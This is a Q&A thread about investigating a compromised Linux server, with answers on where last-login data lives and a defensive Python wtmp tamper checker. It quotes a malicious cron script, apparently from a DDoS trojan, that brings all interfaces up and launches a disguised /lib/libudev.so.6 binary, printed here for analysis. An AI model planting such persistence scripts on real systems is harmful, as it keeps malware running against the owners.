
My client's Linux server recently got compromised by unknown means (highly likely because of a weak password). When I first logged into the compromised server I discovered the following:

  • The log files were wiped

  • SSH last login IP still had my IP and date and not the intruder's

  • The following malicious code was found in a cron job:

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep:|awk -F {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6

I am doing a forensic investigation to find out what exploit was used and how the server was hacked. The current presumption is an SSH password brute force, but I have no evidence to prove it.

My questions would be:

  1. Where is the SSH last login stored? Was it tampered with?
  2. Why does the DDoS virus maliciously deal with the libudev library?
  3. Do you know exactly which virus this is? I've seen a couple of other questions containing this kind of code, but no answer which kind of DDoS virus exactly it is.
  4. What does this code line do?
    for i in `cat /proc/net/dev|grep:|awk -F {'print $1'}`; do ifconfig $i up& done

Thank you for your time.

AleksanderCH
Sir Muffington
  • *"Is the SSH last login message reliable or rather something easy to get tampered with?"* I am afraid the only way to tell for 100% sure is looking into the source code – Raymond Nijland Jun 17 '19 at 13:58
  • *"but no answer which kind of DDoS virus exactly it is."* it looks like it is the *"Unix Trojan.DDoS_XOR-1, Chinese Chicken Multiplatform DoS botnets Trojan "* – Raymond Nijland Jun 17 '19 at 14:15
  • `for i in `cat /proc/net/dev|grep:|awk -F {'print $1'}`; do ifconfig $i up& done` simply finds all your ethernet IP addresses to be passed to the `/lib/libudev.so.6` program – Raymond Nijland Jun 17 '19 at 14:21
  • *"Current presumption is SSH password Bruteforce, but I have no evidence to prove it. "* You could try to contact the ISP of your client to see if they will provide logs, or at least ask them if they see weird traffic on the SSH port in the logs. – Raymond Nijland Jun 17 '19 at 14:23
  • @RaymondNijland, I think the script tries to bring network interfaces up, not pass IP addresses. – VL-80 Jun 17 '19 at 14:37
  • *" I think the script tries to bring network interfaces up, not pass IP addresses"* indeed @VL-80, I misinterpreted the code; it indeed will start all the available network interfaces – Raymond Nijland Jun 17 '19 at 14:43

1 Answer

The last login information is stored in a log file. If the attacker has wiped or expunged other log files, it's likely that they've wiped this one as well.

Specifically the last login information comes from the wtmp file, typically located at /var/log/wtmp.

The crontab entry enumerates the available network interfaces and brings them up. It's a crude way of making it harder to disconnect the machine from the network.

The last two lines of the crontab script copy /lib/libudev.so to /lib/libudev.so.6 and then execute /lib/libudev.so.6. The current version of libudev is 1, so this file wouldn't interfere with the normal working of the system, but I guess it wouldn't immediately jump out as suspicious if you happened to notice it in a directory listing.

Understanding how the malware works is interesting, but it's unlikely to help you find how it got there.

What you've found is pretty crude and obvious, but there are probably other less obvious things as well. As usual, the only way to get a clean system is to nuke this one and start from scratch.

Gilles 'SO- stop being evil'
  • Any clue why it targets the libudev? I found an interesting blog post about this kind of trojan https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ – Sir Muffington Jun 18 '19 at 16:09
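As an added example for the answer's first point (where the last-login data lives and whether it can be trusted), here is a small parser for the binary wtmp format, written for this page and not taken from the question, the answer, or any tool mentioned here. It assumes the 384-byte glibc struct utmp layout used on x86_64 Linux (the same layout as /var/run/utmp and /var/log/btmp, the latter holding failed logins, which is where evidence of a password brute force would normally show up). The sample records are constructed; on a real image you would pass the bytes of /var/log/wtmp (or a copy of it) to parse_wtmp and check_wtmp. The tamper checks are deliberately cheap: an empty file, a size that is not a multiple of the record size, timestamps that go backwards, and a logout record whose matching login is missing, which is what a log cleaner that deletes single entries leaves behind.

```python
import ipaddress
import struct
from datetime import datetime, timezone

UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"  # glibc struct utmp on x86_64, little-endian
UTMP_SIZE = struct.calcsize(UTMP_FMT)      # 384 bytes per record
BOOT_TIME, USER_PROCESS, DEAD_PROCESS = 2, 7, 8


def _cstr(raw):
    """Decode a NUL-padded fixed-width char field."""
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def _addr(words):
    """ut_addr_v6 holds an IPv4 in words[0] (rest zero) or a full IPv6 address."""
    if not any(words):
        return ""
    packed = struct.pack("<4i", *words)
    if not any(words[1:]):
        return str(ipaddress.IPv4Address(packed[:4]))
    return str(ipaddress.IPv6Address(packed))


def parse_wtmp(data):
    """Split a wtmp/utmp/btmp byte string into records; raise on a malformed size."""
    if len(data) % UTMP_SIZE:
        raise ValueError(f"length {len(data)} is not a multiple of {UTMP_SIZE}: "
                         "file truncated or not the x86_64 utmp layout")
    records = []
    for off in range(0, len(data), UTMP_SIZE):
        f = struct.unpack_from(UTMP_FMT, data, off)
        records.append({
            "type": f[0], "pid": f[1], "line": _cstr(f[2]), "user": _cstr(f[4]),
            "host": _cstr(f[5]), "time": datetime.fromtimestamp(f[9], timezone.utc),
            "addr": _addr(f[11:15]),
        })
    return records


def last_logins(records):
    """Most recent interactive login per user, derived from wtmp like `last` does."""
    latest = {}
    for r in records:
        if r["type"] == USER_PROCESS and r["user"]:
            latest[r["user"]] = r
    return latest


def check_wtmp(data):
    """Cheap tamper indicators: empty file, bad size, time going backwards, orphaned logouts."""
    if not data:
        return ["wtmp is empty: wiped or freshly rotated, last-login data is gone"]
    try:
        records = parse_wtmp(data)
    except ValueError as e:
        return [str(e)]
    findings, open_lines, prev = [], set(), None
    for r in records:
        when = f"{r['time']:%Y-%m-%d %H:%M:%S}"
        if prev and r["time"] < prev:
            findings.append(f"time goes backwards at {when}: record edited or inserted")
        prev = r["time"]
        if r["type"] == USER_PROCESS:
            open_lines.add(r["line"])
        elif r["type"] == DEAD_PROCESS:
            if r["line"] not in open_lines:
                findings.append(f"logout on {r['line']} at {when} has no matching login: record removed?")
            open_lines.discard(r["line"])
    return findings


def make_record(ut_type, pid, line, user, host, ts, addr=""):
    """Build one constructed utmp record (sample data only, not read from a system)."""
    packed = ipaddress.ip_address(addr).packed if addr else b""
    words = struct.unpack("<4i", packed.ljust(16, b"\0"))
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, ts, 0, *words)


# Constructed sample: boot, admin logs in and out over SSH, then root logs in.
SAMPLE_WTMP = b"".join([
    make_record(BOOT_TIME, 0, "~", "reboot", "5.0.0-generic", 1560000000),
    make_record(USER_PROCESS, 1201, "pts/0", "admin", "198.51.100.7", 1560000100, "198.51.100.7"),
    make_record(DEAD_PROCESS, 1201, "pts/0", "", "", 1560003700),
    make_record(USER_PROCESS, 1530, "pts/1", "root", "203.0.113.9", 1560010000, "203.0.113.9"),
])
# The same file with admin's login record deleted: the logout on pts/0 is now orphaned.
TAMPERED_WTMP = SAMPLE_WTMP[:UTMP_SIZE] + SAMPLE_WTMP[2 * UTMP_SIZE:]

if __name__ == "__main__":
    for user, r in last_logins(parse_wtmp(SAMPLE_WTMP)).items():
        print(f"{user:8} {r['line']:6} {r['addr']:16} {r['time']:%Y-%m-%d %H:%M:%S}")
    print("sample  :", check_wtmp(SAMPLE_WTMP) or "no findings")
    print("tampered:", check_wtmp(TAMPERED_WTMP))
```

Because wtmp is plain data owned by root, none of these checks prove integrity; a root-level intruder can rewrite the file consistently. They only catch the lazy cases (truncation to zero bytes, single records cut out), which is why the answer's advice to treat the whole system as untrusted still stands. Correlating the file against sources the intruder could not reach (the ISP or gateway flow logs mentioned in the comments, or remote syslog if it existed) is the only way to get a reliable timeline.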